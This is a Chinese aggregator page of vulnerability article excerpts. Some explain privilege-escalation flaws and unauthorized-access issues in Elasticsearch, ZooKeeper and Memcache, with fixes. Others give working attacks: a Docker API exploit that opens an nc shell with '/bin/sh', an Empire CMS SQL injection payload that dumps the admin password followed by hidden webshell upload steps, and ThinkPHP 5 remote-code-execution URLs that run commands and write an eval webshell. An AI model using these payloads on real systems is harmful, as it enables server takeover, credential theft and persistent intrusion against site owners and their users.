精华内容
参与话题
问答
  • 权限漏洞:水平权限漏洞、垂直权限漏洞

    万次阅读 多人点赞 2019-07-31 19:21:31
    水平权限漏洞是指Web应用程序接收到用户请求时,没有判断数据的所属人,或者在判断数据所属人时是从用户提交的参数中获取了userid,导致攻击者可以自行修改userid修改不属于自己的数据。 漏洞示例: XXX/...

    水平权限漏洞是指Web应用程序接收到用户请求时,没有判断数据的所属人,或者在判断数据所属人时是从用户提交的参数中获取了userid,导致攻击者可以自行修改userid修改不属于自己的数据。

    漏洞示例:

    XXX/getAddress?id=1

    如上,攻击者修改addressId即可得到他人的address信息。开发容易习惯性的在生成CRUD(增查改删)表单(或AJAX请求)的时候根据认证过的用户身份来找出其有权限的被操作对象的id来提供入口,然后让用户提交请求,并根据这个id来操作相关对象。在处理CRUD请求时,都天真地默认只有有权限的用户才知道这个入口,进而才能操作相关对象,因此就不再校验权限了。可悲剧的是大多数对象的ID都被设置为自增整型,所以攻击者只要对相关id加1、减1、直至遍历,就可以操作其他用户所关联的对象了。

    修复方案:

    1、最正规的方案:把权限的控制转移到数据接口层中,避免出现select/update/delete ... where addressID=#addressID#的SQL语句,使用select/update/delete... where addressID=#addressID# and ownerId=#userId#来代替,要求web层在调用数据接口层的接口时额外提供userid,而这个userid在web层看来通常只能通过seesion来取到,以防用户造假。但这个方案的缺陷在于实现起来要改动底层的设计,所以不适合作为修复方案,更适合作为在最开始设计时的统一控制方案。

    2、最直接有效的修复方案:在web层的逻辑中做鉴权,检查提交CRUD请求的操作者(通过session或token等加密信息中得到,以防造假)与目标对象的权限所有者是否一致,如果不一致则阻断。这个方案实现成本低、能确保漏洞的修复质量,缺点是增加了一次查库操作。我之前一直用这种方案来对已发生的水平权限漏洞做紧急修复。

    另外的方法:

    1、可对ID加密

    2、使用UUID

    3、每一个信息增加一个发布人的字段,修改的人必须与发布的人为同一个人才可以访问

     

    垂直权限漏洞是指Web应用没有做权限控制,或仅仅在菜单上做了权限控制,导致恶意用户只要猜到了其他页面的URL,就可以访问或控制其他角色拥有的数据或页面,达到权限提升的目的。

    修复方案:

    只需要对url资源进行权限验证即可。

    展开全文
  • 漏洞学习记录

    万次阅读 2020-10-15 16:13:59
    CATALOG1.Elasticsearch未授权漏洞2.ZooKeeper 未授权访问漏洞 1.Elasticsearch未授权漏洞 端口号 9200/9300 漏洞介绍 Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的...

    1.Elasticsearch未授权漏洞

    1. 端口号
      9200/9300
    2. 漏洞介绍
      Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。
    3. 利用思路
      可用来读取对应index里面的信息,可将其理解成一个数据库每一个index就是一张表每一个type就是一个字段,一个index里面有很多字段。
    4. 操作相关
      要利用这个漏洞,最重要的就是查看数据,下面是elasticsearch基本的查询方法

    查询所有的 index, type:
    curl localhost:9200/_search?pretty=true
    查询某个index下所有的type:
    curl localhost:9200/films/_search
    查询某个index 下, 某个 type下所有的记录:
    curl localhost:9200/films/md/_search?pretty=true
    带有参数的查询:
    curl localhost:9200/films/md/_search?q=tag:good
    使用JSON参数的查询: (注意 query 和 term 关键字)
    curl localhost:9200/film/_search -d ’
    {“query” : { “term”: { “tag”:“bad”}}}’
    http://192.168.80.126:9200/_plugin/head/ #web管理界面
    http://192.168.80.126:9200/_cat/indices #查看集群当前状态
    http://192.168.80.126:9200/_nodes #查看节点数据
    http://192.168.80.126:9200/_river/_search #查看数据库敏感信息

    1. 实际操作
    • 直接访问ip:9200
      在这里插入图片描述
    • ip:9200/_cat/indices/?v #查询所有的index
      在这里插入图片描述
    • ip:9200/_mapping?pretty=true #查询所有index与其对应的type
      在这里插入图片描述
    • ip:9200/index的名字/_search?pretty=ture #查询对应index的type的具体值
      在这里插入图片描述
    1. 修复建议
      1、为elasticsearch增加登录验证,可以使用官方推荐的shield插件,该插件为收费插件,可试用30天,免费的可以使用elasticsearch-http-basic,searchguard插件。插件可以通过运行Biplugin install [github-name]/repo-name。同时需要注意增加验证后,请勿使用弱口令。
      2、架设nginx反向代理服务器,并设置http basic认证来实现elasticsearch的登录认证。
      3、默认开启的9200端口和使用的端口不对外公布,或架设内网环境。
      4、elasticsearch 早期版本在“CVE中文漏洞信息库”网站上已有部分漏洞被披露,建议使用1.7.1以上版本或使用最新版本程序。
      5、限制IP访问,绑定固定IP
    2. 参考
      Elasticsearch未授权访问漏洞

    2.ZooKeeper 未授权访问漏洞

    1. 端口号
      2181

    2. 漏洞介绍
      ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效、功能稳定的系统提供给用户。

    3. 利用思路
      ZooKeeper默认开启在2181端口,在未进行任何访问控制情况下,攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境

    4. 利用相关
      zookeeper下载地址:http://archive.apache.org/dist/zookeeper/
      zookeeper可视化管理工具下载连接:https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

    5. 实际操作

    • echo envi|nc ip 2181#返回大量敏感信息,host名等,下图为节选
      在这里插入图片描述
    • 也可以使用图形化界面查询Zookeeper中的内容
      在这里插入图片描述
    1. 修复建议
      禁止把Zookeeper直接暴露在公网
      添加访问控制,根据情况选择对应方式(认证用户,用户名密码,指定IP)
      配置防火墙策略,只允许指定IP访问2181端口
      配置服务ACL限制IP访问
    2. 参考
      Zookeeper 未授权访问漏洞

    3.Memcache未授权访问

    memcache是一套分布式的高速缓存系统,它以Key-Value(键值对)形式将数据存储在内存中,默认开放11211端口,使用nmap的脚本进行扫描。

    1. 端口号
      11211

    2. 漏洞介绍
      memcache是一套分布式的高速缓存系统,它以Key-Value(键值对)形式将数据存储在内存中,默认开放11211端口,使用nmap的脚本进行扫描。

    3. 利用思路
      直接使用nc进行连接获取敏感信息

    4. 利用相关
      stats 查看memcache 服务状态
      stats items 查看所有items

    5. 实际操作
      在这里插入图片描述
      在这里插入图片描述

    6. 修复建议
      一、 因memcache无权限控制功能,所以需要用户对访问来源进行限制。一般不需要外网访问的,可以直接绑定本地127.0.0.1 即可,实现方式如下:
      [root@local ~]# vim /etc/sysconfig/memcached
      OPTIONS="-l 127.0.0.1" #设置本地为监听
      [root@local ~]# /etc/init.d/memcached restart #重启服务
      二、 当memcached 配置为监听内网IP或公网IP时, 使用主机防火墙(iptalbes、firewalld等)和网络防火墙对memcached服务端口进行过滤。

    7. 参考
      未授权漏洞测试
      Memcache未授权访问漏洞利用及修复

    4.docker未授权漏洞利用

    扫描出docker未授权漏洞后使用脚本dockerRemoteApiGetRootShell.py进行攻击。攻击过程如下:

    1. 下载脚本:下载地址
    2. 安装依赖库(基于python2)
      pip install -r requirements.txt
    3. 获取受害主机shell
      python dockerRemoteApiGetRootShell.py -h ip -p 2375 # 获取docker id
      python dockerRemoteApiGetRootShell.py -h ip -p 2375 -e “nc -lvvp 9998 -e /bin/sh” -I c60d6d45e76c7d3f9d7abae075cb77b4924bd7133eebddc59679f2a60eb32bc2 #反弹shell
    展开全文
  • 帝国CMS最新漏洞获取管理员密码 ...令人无奈的是,“帝国”虽然把势力壮大了,却忽略了自身防护的建设,结果在黑客攻击下,“帝国”沦陷了。“帝国”CMS曝出的漏洞能够让黑客在1分钟内...漏洞的成因: 都说安全是一个...

    帝国CMS最新漏洞获取管理员密码

    “帝国”CMS是一套著名的PHP整站程序,是国内使用人数最多的PHPCMS程序之一。令人无奈的是,“帝国”虽然把势力壮大了,却忽略了自身防护的建设,结果在黑客攻击下,“帝国”沦陷了。“帝国”CMS曝出的漏洞能够让黑客在1分钟内拿到管理员的账户密码,之后更能轻松获取webshell。下面让我们一起来对“帝国”CMS进行一次入侵检测。

    漏洞的成因:

    都说安全是一个整体,千里之堤毁于蚁穴,往往一个看似坚不可摧的网站系统,在某个不被注意的角落出现了一个极小的疏忽,结果导致整个网站被黑客攻陷。“帝国”CMS正是这样被攻破的,先让我们来探索问题的究竟。

    问题出在“帝国”CMS附带的留言板程序上,由于留言板功能相对于“帝国”CMS而言显得较为鸡肋,因此很少有站长重视它,可问题却偏偏出现在 留言板的代码中。由于变量过滤不严,黑客可以在留言板中执行一些越权操作,例如读取数据中的任意数值。当然要拿到管理员的账户和密码也就不在话下了。

    漏洞的利用:

    暴出管理员账户名和密码:

    使用“帝国”CMS的网站很多,因此找测试的目标很容易。我们直接打开“帝国”的官方网站:,依次点击导航栏处的“服务项目”→“部分案例”,这里链接了600多个采用“帝国”CMS的网站,足够让我们进行测试了。

    我们在其中挑选一个打开进行测试,在网站域名后输入:e/tool/gbook/?bid=1并回车,这样就打开了“帝国”CMS的留言功能。触发漏洞的步骤为:

    Step1.在“姓名”处输入:縗

    Step2.在“联系邮箱”处输入:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

    Step3.“留言内容”随意填写,输入完毕后点击“提交”按钮。

    如果漏洞成功触发,我们会在留言列表中看到暴出的管理员账户名和密码。但不要高兴得太早,因为曝出的密码是经过MD5加密的32位密文,如果破解不出是毫无意义的。

    上传webshell:

    拿到管理员账户名和密码后,我们就可以登录网站后台了。在域名后输入“e/admin/”并回车,出现登陆验证页面,输入账户名admin和密码进行登录。

    在后台我们依次点击“模板管理”→“增加自定义”链接。在“增加自定义”页面中,我们在“文件名”中输入需要建立的webshell文件名,为了隐蔽性,最好取和网站自身文件比较接近的文件名,例如ListQz.php。然后在“页面内容”中输入php木马的内容,其他项目可以随意填写,输入完毕后 点击“提交”。下面只要我们访问:***.com/e/admin/ListQz.php这个地址,一个令人激动地webshell就会出现了。

    展开全文
  • 漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的...

    漏洞概况

    ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。

    漏洞危害

    攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等问题。

    影响版本

    5.x < 5.1.31, <= 5.0.23

    复现环境

    thinkphp5.1   phpstudy集成环境(php5.6n+apache+mysql)

    复现过程

    1、如图所示首先搭建好环境

    2、利用system函数远程命令执行:

    http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami

    3、通过phpinfo函数写出phpinfo()的信息:

    http://localhost/thinkphp5.1/html/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

    4、写入shell:

    http://localhost/thinkphp5.1/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

    或http://localhost/thinkphp5.1/html/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

     

     

     

    展开全文
  • 软件漏洞分析简述

    万次阅读 2020-02-04 01:36:59
    软件漏洞 1.1漏洞的定义 漏洞,也叫脆弱性(英语:Vulnerability),是指计算机系统安全方面的缺陷,使得系统或其应用数据的保密性、完整性、可用性、访问控制等面临威胁。 漏洞在各时间阶段的名称 根据是否公开分为...
  • 逻辑漏洞之支付漏洞

    千次阅读 2018-06-01 17:00:02
    支付漏洞乌云案例之顺丰宝业务逻辑漏洞案例说明顺丰宝存在支付逻辑漏洞,可以允许用户1元变1亿元。这个漏洞在其他网站很难存在,原因是页面交互都使用了对字段做签名。但是顺丰宝没做签名,导致支付金额可以被修改为...
  • 逻辑漏洞之越权访问漏洞

    千次阅读 2019-06-26 18:53:08
    越权漏洞 越权漏洞的挖掘 越权漏洞的修复 越权漏洞 越权漏洞是Web应用程序中一种常见的安全漏洞。该漏洞是指应用在检查授权时存在纰漏,使得攻击者在获得低权限用户账户后,利用一些方式绕过权限检查(比如说修改...
  • 网站漏洞修复之最新版本UEditor漏洞

    万次阅读 2018-08-30 08:05:58
    UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以...
  • Kali学习 | 漏洞扫描:3.2 使用Nessus扫描漏洞扫描本地漏洞扫描网络漏洞扫描指定Linux的系统漏洞扫描指定Windows的系统漏洞 扫描本地漏洞 (1)新建名为Local Vulnerability Assessment策略。 (2)添加所需的插件...
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ 阿里云漏洞响应平台:https://security.alibaba.com/ i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应...
  • K8 Struts2 Exploit(Struts2综合漏洞利用工具)

    千次下载 热门讨论 2015-05-30 09:29:02
    K8 Struts2远程代码执行漏洞利用工具 (Apache Struts Remote Code Execution Exploit) Struts2漏洞检测工具 Struts2漏洞测试工具 K8 struts2 exploit Test Struts2 GetShell 目前已支持以下struts2漏洞编号 (S2-005 ...
  • Android:你不知道的 WebView 使用漏洞

    万次阅读 多人点赞 2017-03-22 09:13:52
    现在很多App里都内置了Web网页(Hyprid App),比如说很多电商平台,淘宝、京东、聚划算等等,如下图上述功能是由 Android的WebView 实现的,但是 WebView 使用过程中存在许多漏洞,容易造成用户数据泄露等等危险,...
  • XSS(跨站脚本)漏洞详解 XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script...
  • Android平台漏洞挖掘与利用

    千人学习 2015-10-30 15:33:25
    Android平台漏洞挖掘与利用视频教程,该课程将介绍几类漏洞的特征以及利用方法。本次课程将以Qualcomm平台上的CVE-2013-6123漏洞为例,介绍如何找出危险的数据交换代码,以及如何稳定利用任意地址写漏洞。也将介绍...
  • 1  Oracle Database Server远程安全漏洞(CVE-2015-4863) 2  Oracle Database Server OJVM 本地安全漏洞(CVE-2017-10202) 3  Oracle Database Server Java VM组件安全漏洞(CVE-2018-3110) 4  Oracle Database ...
  • 文件上传漏洞

    千次阅读 多人点赞 2018-09-29 20:05:03
    文件上传漏洞 文件上传的过滤 上传文件过滤的绕过 上传html文件 文件上传的防御 upload-libs 文件上传漏洞 文件上传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,...
  • 文件包含漏洞

    千次阅读 多人点赞 2018-09-23 18:53:31
    文件包含漏洞成因 为什么要包含文件? 如何利用这个漏洞? 本地包含 远程包含 文件包含漏洞的防御 文件包含漏洞成因 文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务器端...
  • 随着互联网应用的快速发展,信息安全已深入到诸多领域,前段时间发生的“Struts 2”漏洞及“心脏出血”漏洞影响了二亿中国网民的信息安全,原因是程序员缺少仔细的安全检查导致的。作为程序员,此时我们应该更加...
  • 文件解析漏洞

    千次阅读 2018-09-25 08:40:27
    文件解析漏洞 IIS解析漏洞 目录解析漏洞(/test.asp/1.jpg) 文件名解析漏洞(test.asp;.jpg) 畸形解析漏洞(test.jpg/*.php) 其他解析漏洞 Ngnix解析漏洞 畸形解析漏洞(test.jpg/*.php) %00空字节代码解析漏洞 ...
  • Tomcat漏洞集合

    千次阅读 2019-01-20 21:48:37
    Tomcat的几大高危漏洞 Tomcat安全措施 Tomcat的几大高危漏洞 1、Tomcat后台弱口令上传war包(Tomcat管理弱口令页面Getshell) 2、Tomcat的PUT的上传漏洞(CVE-2017-12615) (Tomcat PUT方法任意文件上传(CVE-2017-...
  • 米斯特白帽培训讲义 逻辑漏洞 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 任意密码找回这是补天平台上的一个案例:http://www.118114.cn/reg.jsp首先注册一个账号,然后找回。我们收到的验证码是六...
  • OpenSSL相关漏洞

    千次阅读 2019-05-31 14:09:48
    心脏出血漏洞(CVE-2014-0160) OpenSSL CCS注入漏洞(CVE-2014-0224) OpenSSL FREAK Attack漏洞(CVE-2015-0204) TLS/SSL协议RC4算法漏洞(CVE-2013-2566) SSLv3 POODLE攻击信息泄露漏洞(CVE-2014-3566) 关于...
  • 漏洞细节 1、找到酷我会员购买界面,使用微信支付方式 2、正常情况下需要通过扫描微信的支付验证码,支付10元购买一个月会员 3、0元购买时通过修改数据包的付费金额为0.01元,然后扫描微信支付成功后就可以...
  • Gitlab相关漏洞

    千次阅读 2020-01-15 10:04:05
    Gitlab相关漏洞 Gitlab任意文件读取漏洞(CVE-2016-9086) Gitlab敏感信息泄露漏洞(CVE-2017-0882) Gitlab远程代码执行漏洞(CVE-2018-14364) Gitlab Wiki API 远程代码执行漏洞(CVE-2018-18649) Gitlab GitLab是...
  • 服务器解析漏洞

    千次阅读 2018-06-23 10:44:30
    服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在。在此记录汇总一些常见服务器的解析漏洞,比如IIS6.0、IIS7.5、apache、nginx等方便以后回顾温习。(一)IIS5.x-6.x解析漏洞使用iis5.x-6.x版本的服务器,...
  • Android常见漏洞

    千次阅读 2016-05-08 20:54:01
    Android常见漏洞 漏洞名称: Log敏感信息泄露 漏洞描述: 程序运行期间打印了用户的敏感信息,造成泄露 修改建议: 建议禁止隐私信息的log   漏洞名称: web https校验错误忽略漏洞 漏洞描述: ...
  • 目录 目录浏览(目录遍历)漏洞 任意文件读取/下载漏洞 利用任意文件读取漏洞Getshell 目录浏览(目录遍历)漏洞 ...目录浏览漏洞的探测:可以利用web漏洞扫描器扫描web应用进行检测,也可通过搜索,网站标...
  • Bash漏洞解析

    千次阅读 2014-09-26 21:10:17
    预备知识 Bash UNIX-like系统上的shell,可以让用户在UNIX-like系统输入并执行命令的一个解释器,一般通过ssh或...Bash漏洞 释义:Bash会对环境变量赋值中的函数定义后的字符串进行处理(言外之意,攻击者可以布局代
  • WebLogic SSRF 及漏洞修复

    万次阅读 2016-09-12 21:56:01
    原文:...SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端。攻击者可以利用该漏洞绕过访问限制(...
  • 永恒之蓝漏洞利用及攻击

    万次阅读 多人点赞 2019-04-20 23:19:54
    永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索...

空空如也

1 2 3 4 5 ... 20
收藏数 106,829
精华内容 42,731
关键字:

漏洞